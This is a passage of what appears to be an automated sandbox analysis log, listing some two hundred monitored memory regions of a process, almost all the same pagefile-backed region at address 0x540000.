end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5246 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5247 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5248 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5249 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5250 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5251 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5252 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5253 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5254 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5255 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5256 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5257 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5258 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5259 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5260 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5261 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5262 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5263 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5264 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5265 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5266 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5267 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5268 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5269 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5270 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5271 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5272 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5273 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5274 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5275 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5276 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5277 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5278 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5279 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5280 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5281 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5282 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5283 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5284 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5285 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5287 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5288 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5289 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5290 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5291 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5292 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5293 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5294 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5295 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5296 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5297 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5298 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5299 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5300 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5301 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5302 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5303 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5304 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5305 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5306 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5307 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5308 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5309 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5310 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5311 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5312 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5313 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5314 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5315 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5316 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5317 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5318 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5319 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5320 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5321 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5322 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5323 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5324 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5325 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5326 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5327 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5328 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5329 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5330 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5331 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5332 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5333 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5334 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5335 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5336 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5337 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5338 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5339 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5340 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5341 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5342 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5343 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5344 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5345 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5346 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5347 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5348 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5349 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5350 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5351 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5352 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5353 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5354 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5355 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5356 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5357 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5358 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5359 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5360 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5361 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5362 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5363 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5364 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5365 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5366 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5367 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5368 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5369 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5370 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5371 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5372 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5373 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5374 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5375 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5376 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5377 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5378 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5379 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5380 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5381 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5382 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5383 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5384 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5385 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5386 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5387 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5388 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5389 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5390 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5391 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5392 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5393 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5394 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5395 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5396 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5397 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5398 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5399 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5400 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5401 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5402 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5403 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5406 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5407 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5408 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5409 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5410 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5411 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5412 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5413 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5414 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5415 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5416 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5417 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5418 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5419 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5420 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5421 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5422 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5423 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5424 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5425 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5426 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5427 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5428 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5429 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5430 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5431 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5432 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5433 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5434 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5435 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5436 start_va = 